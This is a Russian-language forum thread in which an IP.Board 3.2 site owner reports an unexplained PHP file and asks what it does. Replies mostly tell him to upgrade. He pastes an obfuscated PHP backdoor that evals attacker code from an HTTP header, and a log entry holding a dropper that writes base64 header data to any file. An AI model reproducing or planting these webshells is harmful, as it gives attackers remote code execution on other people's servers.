Перейти к содержанию

Непонятный PHP-файл, который появился сам в IPB 3.2


EIKA

Рекомендуемые сообщения

Здравствуйте!

 

Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php.

 

Файл нашел в 2 местах, содержимое отличается:

 

В корне:

<?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?>

В папке cache:


==============================================================================
 URL: /index.php/index.php
 Date: Tue, 20 Nov 2012 10:16:53 +0000
 IP Address: 31.3.250.226
 Time Taken: 0.04346
 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?>

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================

IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил.

 

Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер.

 

Внимание, вопросы:

 

1. Что это такое?

2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)?

3. Что оно делало?


Точная версия борды:

 

IP.Board Version 3.2.0 (ID:32003) Изменено пользователем EIKA
Ссылка на комментарий
Поделиться на другие сайты

Обновись до 3.4.6

бессмысленные посты не нужно писать. 

Ссылка на комментарий
Поделиться на другие сайты

бессмысленные посты не нужно писать. 

Почему бессмысленные? IPB 3.2 забита уязвимостями 

Ссылка на комментарий
Поделиться на другие сайты

Почему бессмысленные? IPB 3.2 забита уязвимостями 

ТС спрашивает о файле, а не о том, как защитится. 

Ссылка на комментарий
Поделиться на другие сайты

Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил...

Ссылка на комментарий
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Последние посетители   0 пользователей онлайн

    • Ни одного зарегистрированного пользователя не просматривает данную страницу
×
×
  • Создать...